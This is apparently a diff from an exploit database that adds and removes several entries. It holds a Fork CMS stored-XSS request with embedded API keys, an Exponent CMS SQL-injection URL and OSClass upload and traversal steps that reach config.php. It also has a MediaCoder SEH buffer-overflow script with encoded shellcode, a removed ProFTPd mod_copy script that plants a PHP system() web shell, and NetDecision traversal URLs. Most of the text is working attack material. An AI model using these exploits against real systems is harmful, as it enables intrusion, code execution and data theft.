form=settingsIndex&form_token=&site_title=My+website&site_html_header=&site_html_footer="><script>alert("ZSL");</script>&time_format=H%3Ai&date_format_short=j.n.Y&date_format_long=l+j+F+Y&number_format=dot_nothing&fork_api_public_key=f697aac745257271d83bea80f965e3c1&fork_api_private_key=6111a761ec566d325a623e0dcaf614e2&akismet_key=&ckfinder_license_name=Fork+CMS&ckfinder_license_key=QJH2-32UV-6VRM-V6Y7-A91J-W26Z-3F8R&ckfinder_image_max_width=1600&ckfinder_image_max_height=1200&addValue-facebookAdminIds=&facebook_admin_ids=&facebook_application_id=&facebook_application_secret=

9
platforms/php/webapps/36916.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52328/info
Exponent CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exponent CMS 2.0.4 is vulnerable; prior versions may also be affected.
http://www.example.com//exponent/cron/send_reminders.php?src=src%3d11"%3b}'%20or%201%3d1%20AND%20SLEEP(5)%20%3b%20--%20"

43
platforms/php/webapps/36917.txt Executable file
View file

@ -0,0 +1,43 @@
source: http://www.securityfocus.com/bid/52336/info
OSClass is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to obtain sensitive information and to upload arbitrary code and run it in the context of the webserver process.
OSClass 2.3.5 is vulnerable; prior versions may also be affected.
Arbitrary File Upload Vulnerability:
1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type)
2. Upload that file as picture for a new item and get its name (is 5_small.jpg)
3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php)
4. Use combine.php to move itself to oc-content/uploads
http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php
now we have a copy of combine.php placed into uploads dir (the same dir where our malicius php file has been uploaded)
5. Use uploads/combine.php to move 5_original.php to /remote.php
http://www.example.com/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php
6. Run the uploaded php file
http://www.example.com/osclass/remote.php
Directory Traversal Vulnerability:
It is possible to download and arbitrary file (ie config.php) under the www root.
1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding)
2. Move combine.php into web root
http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php
3. Run combine to download config.php
http://www.example.com/osclass/combine.php?files=config.php

50
platforms/windows/local/36920.py Executable file
View file

@ -0,0 +1,50 @@
#!/usr/bin/python
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com=20
# Version: 0.8.34.5716
# Tested on: Win XP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.=
info&file=3DMediaCoder-0.8.34.5716.exe
# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insifficient space after taking control of the EIP, you hav=
e to jump backwards and also=20
# avoid a few bad bytes after the "A"s.
#!/usr/bin/python
buffersize =3D 853
buffer =3D ("http://" + "\x41" * 256)
#Space for shellcode to decode
buffer +=3D "\x90" * 24
# msfpayload windows/exec CMD=3Dcalc R|msfencode -b "\x00\x0a\x0d\x20" -t c=
-e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1)
#unsigned char buf[] =3D=20
buffer +=3D("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
"\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47"
"\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec"
"\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3"
"\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57"
"\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31"
"\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc"
"\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0"
"\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27"
"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
buffer +=3D "\x42" * 350
nseh =3D "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]=20
seh=3D"\xee\x04\x01\x66"
#Jump back 603 bytes due to insufficient space for shellcode
jmpbck =3D "\xe9\xA5\xfd\xff\xff"
junk =3D ("D" * 55)=20
f=3D open("exploit.m3u",'w')
f.write(buffer + nseh + seh + jmpbck + junk)
f.close()

47
platforms/windows/remote/36803.py
View file

@ -1,47 +0,0 @@
# Title: ProFTPd 1.3.5 Remote Command Execution
# Date : 20/04/2015
# Author: R-73eN
# Software: ProFTPd 1.3.5 with mod_copy
# Tested : Kali Linux 1.06
# CVE : 2015-3306
# Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(len(sys.argv) < 4):
print '\n Usage : exploit.py server directory cmd'
else:
server = sys.argv[1] #Vulnerable Server
directory = sys.argv[2] # Path accessible from web .....
cmd = sys.argv[3] #PHP payload to be executed
evil = '<?php system("' + cmd + '") ?>'
s.connect((server, 21))
s.recv(1024)
print '[ + ] Connected to server [ + ] \n'
s.send('site cpfr /etc/passwd')
s.recv(1024)
s.send('site cpto ' + evil)
s.recv(1024)
s.send('site cpfr /proc/self/fd/3')
s.recv(1024)
s.send('site cpto ' + directory + 'infogen.php')
s.recv(1024)
s.close()
print '[ + ] Payload sended [ + ]\n'
print '[ + ] Executing Payload [ + ]\n'
r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
if (r.status_code == 200):
print '[ * ] Payload Executed Succesfully [ * ]'
else:
print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
print '\n http://infogen.al/'

10
platforms/windows/remote/36915.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/52327/info
NetDecision is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.
NetDecision 4.6.1 is vulnerable; other versions may also be affected.
http://www.example.com:8087/...\...\...\...\...\...\windows\system.ini
http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini